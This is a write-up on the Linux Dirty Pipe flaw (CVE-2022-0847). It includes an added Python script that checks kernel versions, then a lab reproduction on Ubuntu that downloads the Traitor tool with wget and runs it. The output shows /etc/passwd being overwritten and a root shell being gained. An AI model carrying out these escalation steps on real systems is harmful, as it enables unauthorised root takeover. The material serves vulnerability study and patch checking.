Dirty Pipe Overview

  • CVE-2022-0847 (Dirty Pipe) is a local privilege escalation vulnerability present in Linux kernel 5.8 and later. It is similar in principle to CVE-2016-5195, the Dirty Cow vulnerability, but is easier to exploit; the vulnerability's discoverer named it Dirty Pipe.
  • Affected range: 5.8 <= Linux kernel version < 5.16.11 / 5.15.25 / 5.10.102
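To turn the affected range above into something an administrator can run across a fleet, here is a small version check. It is an added example, not part of the original write-up or of the Traitor project: it parses a `uname -r` style release string and classifies it against the page's stated boundaries (5.8 <= v < 5.16.11 / 5.15.25 / 5.10.102). The treatment of branches the page does not list (5.9, 5.11 to 5.14, and 5.17 and later) is an assumption and is marked as such in the code.

```python
import platform
import re

# Per-branch first fixed release, taken from the affected range stated above.
FIXED_IN = {
    (5, 16): (5, 16, 11),
    (5, 15): (5, 15, 25),
    (5, 10): (5, 10, 102),
}

FIRST_AFFECTED = (5, 8, 0)

# Assumption (not stated on the page): mainline 5.17 and later shipped after the fix.
FIRST_UNAFFECTED_MAINLINE = (5, 17, 0)


def parse_kernel_release(release: str) -> tuple[int, int, int]:
    """Extract (major, minor, patch) from a release string such as '5.8.0-41-generic'.

    The suffix after the numeric part (distro build tag, '-generic', etc.) is ignored.
    """
    match = re.match(r"\s*(\d+)\.(\d+)(?:\.(\d+))?", release)
    if not match:
        raise ValueError(f"unrecognised kernel release string: {release!r}")
    major, minor, patch = match.groups()
    return int(major), int(minor), int(patch or 0)


def is_dirty_pipe_vulnerable(release: str) -> bool:
    """Return True if the upstream version in `release` falls inside the affected range."""
    version = parse_kernel_release(release)
    if version < FIRST_AFFECTED:
        return False  # the bug was introduced in 5.8
    if version >= FIRST_UNAFFECTED_MAINLINE:
        return False  # assumption: 5.17+ carries the fix
    branch = version[:2]
    if branch in FIXED_IN:
        return version < FIXED_IN[branch]
    # Assumption: branches between 5.8 and 5.16 that the page lists no fix for are
    # treated as affected, which is the conservative choice for an inventory check.
    return True


def assess(releases: list[str]) -> dict[str, bool]:
    """Classify several release strings at once, e.g. values collected from many hosts."""
    return {r: is_dirty_pipe_vulnerable(r) for r in releases}


if __name__ == "__main__":
    # Constructed sample values; the first one is the kernel shown in this write-up.
    samples = ["5.8.0-41-generic", "5.10.102", "5.15.24", "5.16.11", "5.4.0-100-generic"]
    for rel, vuln in assess(samples).items():
        print(f"{rel:>20}: {'AFFECTED' if vuln else 'not affected'}")
    local = platform.release()
    print(f"this host ({local}): {'AFFECTED' if is_dirty_pipe_vulnerable(local) else 'not affected'}")
```

The check compares upstream version numbers only. Distribution kernels such as the Ubuntu `5.8.0-41-generic` build seen later on this page may carry backported fixes without changing the upstream number, so a "not affected" or "AFFECTED" verdict from the version string alone should be confirmed against the distribution's advisory for the installed package before closing or opening a ticket.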

Dirty Pipe Reproduction

  • Ubuntu 20.04 is used here as the test environment, and Traitor is used for the reproduction.
  • Check the current user's privileges and the kernel version:
yongz@ubuntu:/tmp$ id
uid=1003(yongz) gid=1003(yongz) groups=1003(yongz)
yongz@ubuntu:/tmp$ uname -a
Linux ubuntu 5.8.0-41-generic #46~20.04.1-Ubuntu SMP Mon Jan 18 17:52:23 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
  • Download Traitor onto the target machine:
wget https://github.com/liamg/traitor/releases/download/v0.0.14/traitor-amd64
  • Run it:
yongz@ubuntu:/tmp$ ./traitor-amd64 


▀█▀ █▀█ ▄▀█ █ ▀█▀ █▀█ █▀█
░█░ █▀▄ █▀█ █ ░█░ █▄█ █▀▄ v0.0.14
https://github.com/liamg/traitor

[+] Assessing machine state...
[+] Checking for opportunities...
[+][polkit:CVE-2021-3560] Polkit version is vulnerable!
[+][polkit:CVE-2021-3560] System is vulnerable! Run again with '--exploit polkit:CVE-2021-3560' to exploit it.
[+][kernel:CVE-2022-0847] Kernel version 5.8.0 is vulnerable!
[+][kernel:CVE-2022-0847] System is vulnerable! Run again with '--exploit kernel:CVE-2022-0847' to exploit it.
  • Exploit it directly:
yongz@ubuntu:/tmp$ ./traitor-amd64 --exploit kernel:CVE-2022-0847


▀█▀ █▀█ ▄▀█ █ ▀█▀ █▀█ █▀█
░█░ █▀▄ █▀█ █ ░█░ █▄█ █▀▄ v0.0.14
https://github.com/liamg/traitor

[+] Assessing machine state...
[+] Checking for opportunities...
[+][kernel:CVE-2022-0847] Kernel version 5.8.0 is vulnerable!
[+][kernel:CVE-2022-0847] Opportunity found, trying to exploit it...
[+][kernel:CVE-2022-0847] Attempting to set root password...
[+][kernel:CVE-2022-0847] Opening '/etc/passwd' for read...
[+][kernel:CVE-2022-0847] Creating pipe...
[+][kernel:CVE-2022-0847] Determining pipe size...
[+][kernel:CVE-2022-0847] Pipe size is 65536.
[+][kernel:CVE-2022-0847] Filling pipe...
[+][kernel:CVE-2022-0847] Draining pipe...
[+][kernel:CVE-2022-0847] Pipe drained.
[+][kernel:CVE-2022-0847] Splicing data...
[+][kernel:CVE-2022-0847] Writing to dirty pipe...
[+][kernel:CVE-2022-0847] Write of '/etc/passwd' successful!
[+][kernel:CVE-2022-0847] Starting shell...
[+][kernel:CVE-2022-0847] Please exit the shell once you are finished to ensure the contents of /etc/passwd is restored.
[+][kernel:CVE-2022-0847] Setting up tty...
[+][kernel:CVE-2022-0847] Attempting authentication as root...
[+][kernel:CVE-2022-0847] Authenticated as root!

# id
uid=0(root) gid=0(root) groups=0(root)
  • Privilege escalation succeeded!